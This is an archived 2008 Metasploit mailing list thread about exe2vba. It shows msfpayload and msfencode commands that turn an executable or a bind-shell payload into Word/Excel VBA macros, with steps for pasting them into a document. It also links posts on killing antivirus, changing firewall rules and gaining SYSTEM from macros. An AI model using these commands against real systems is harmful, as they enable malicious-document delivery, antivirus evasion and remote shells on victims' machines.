Metasploit mailing list archives

Fwd: Exe2vba - Anybody still have this?


From: natron at invisibledenizen.org (natron)
Date: Mon, 17 Nov 2008 10:27:46 -0600

In case anyone finds this type of thing helpful, here is a series of
posts showing how to use VBA to perform various actions, like kill AV,
modify the Windows firewall, or download files.

Useful to kill AV, then unpack an msf payload that might trigger
antivirus as soon as it's written to the hard drive, but before it's
able to execute.

n


---------- Forwarded message ----------
From: natron <natron at invisibledenizen.org>
Date: Sun, Nov 16, 2008 at 8:50 PM
Subject: Re: Exe2vba - Anybody still have this?
To: H D Moore <sflist at digitaloffense.net>, pen-test at securityfocus.com,
Joseph McCray <joe at learnsecurityonline.com>


I wrote up a quick series of posts on how to use VBA to do all kinds
of things, as long as the user running the Excel/Word file has the
necessary rights.  If anyone would find them useful:

Running commands or launching programs:
http://blog.invisibledenizen.org/2008/11/on-vba-in-excel-and-word-documents.html

Downloading files and saving them to disk:
http://blog.invisibledenizen.org/2008/11/vba-function-to-download-files.html

Running commands as SYSTEM:
http://blog.invisibledenizen.org/2008/11/running-commands-as-system-from-vba-in.html

Killing off any antivirus that may be running:
http://blog.invisibledenizen.org/2008/11/how-to-kill-antivirus-from-word-or.html

Modifying the Windows Firewall:
http://blog.invisibledenizen.org/2008/11/modifying-windows-firewall-rules-from.html


What I would really love to see would be a combination of the
Churrasco exploit
(http://nomoreroot.blogspot.com/2008/10/token-kidnapping-windows-2008-poc.html)
into VBA, so that even if the user is running in a limited account,
they'd be able to gain SYSTEM privileges.

-n

On Wed, Nov 12, 2008 at 1:21 PM, H D Moore <sflist at digitaloffense.net> wrote:
Hi Joseph,

I added this to Metasploit. You can use the VBA generator in a few
different ways:

1) Convert an EXE to a VBA script (works on Word/Excel automatically):

$ ruby msf3/tools/exe2vba.exe mytrojan.exe output.vba

2) Create a VBA script that runs a Metasploit payload

$  ruby msf3/msfpayload windows/shell_bind_tcp LPORT=12345 V > output.vba

3) Create a VBA script that runs an encoded Metasploit payload

$  ruby msf3/msfpayload windows/shell_bind_tcp LPORT=12345 R | \
   ruby msf3/msfencode -a x86 -b '' -t vba   > output.vba

To use the resulting VBA, open Word/Excel, go to Tools -> Macros -> Visual
Basic Editor, paste in, save, and exit. Works pretty well here :-)

You need the latest SVN of Metasploit 3.2 trunk:
 $ svn co http://metasploit.com/svn/framework3/trunk/

On Windows, follow this guide:
 - http://metasploit.com/dev/trac/wiki/Metasploit/Windows/Upgrade_to_SVN

-HD

On Tuesday 11 November 2008, Joseph McCray wrote:
It used to be located at:
http://www.priestmaster.org/tools.html

I've been looking all over the web and really haven't been able to find
this app anymore.

